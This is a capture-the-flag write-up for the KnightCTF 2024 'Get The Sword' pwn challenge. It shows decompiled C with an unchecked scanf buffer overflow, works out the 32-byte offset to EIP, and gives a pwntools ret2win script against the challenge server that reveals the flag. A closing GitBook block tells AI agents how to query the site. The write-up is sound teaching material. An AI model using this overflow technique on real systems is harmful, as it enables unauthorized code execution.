> For the complete documentation index, see [llms.txt](https://sayonara.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sayonara.gitbook.io/writeups/ctf/knightctf2024/pwn/get-the-sword.md).

#  Get The Sword

{% file src="/files/oKSea2cMamXIuZvkUlWk" %}

## <mark style="color:red;">Challenge Description :</mark>&#x20;

<div align="left"><figure><img src="/files/RrRHunn1l30Fban5807D" alt=""><figcaption></figcaption></figure></div>

### <mark style="color:blue;">Basic Binary Enumeration :</mark>&#x20;

we can see that the binary is 32 bit not stripped that means that the functions names are not obfuscated and all the protections are off

<div align="left"><figure><img src="/files/gwtfTbyACTWrh6yeZWSk" alt=""><figcaption></figcaption></figure></div>

let's open the binary in ghidra to analyze it and find potential vulnerabilities

we have 4 functions

```c
undefined4 main(void)
{
  printSword();
  intro();
  return 0;
}

void printSword(void)

{
  puts("      />_________________________________");
  puts("[#####[]_________________________________>");
  puts("      \\>");
  fflush(stdout);
  return;
}

void intro(void)

{
  undefined local_20 [24];
  
  printf("What do you want ? ?: ");
  fflush(stdout);
  __isoc99_scanf(&%s,local_20); // BOF vulnerability
  printf("You want, %s\n",local_20);
  return;
}

// win function
void getSword(void)

{
  system("cat flag.txt");
  fflush(stdout);
  return;
}
```

the function intro is vulnerable since it reads from the user without checking the size of the data received.

### <mark style="color:blue;">Offset to EIP :</mark>&#x20;

we can use gdb to find the offset and we can also use ghidra.

in ghidra we can see that the offset to reach the EIP is 0x20 which 32

<div align="left"><figure><img src="/files/Yh2QntW21aYsd11A0qfs" alt=""><figcaption></figcaption></figure></div>

### <mark style="color:blue;">Exploit :</mark>&#x20;

```python
from pwn import *

# Set up pwntools for the correct architecture
exe = './get_sword'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# io = process(exe)
io = remote('173.255.201.51', 31337)
offset = 32
ret = 0x0804900e #ret gadget (ropper --file=ret2win --search="ret") 
payload = flat(
	offset * b'A',
	elf.functions.getSword
)

io.sendlineafter(b':', payload)

io.interactive()
```

<div align="left"><figure><img src="/files/1DSChIpnLRnSLZngk57u" alt=""><figcaption></figcaption></figure></div>

### <mark style="color:blue;">Flag :</mark>&#x20;

```
KCTF{so_you_g0t_the_sw0rd}
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://sayonara.gitbook.io/writeups/ctf/knightctf2024/pwn/get-the-sword.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.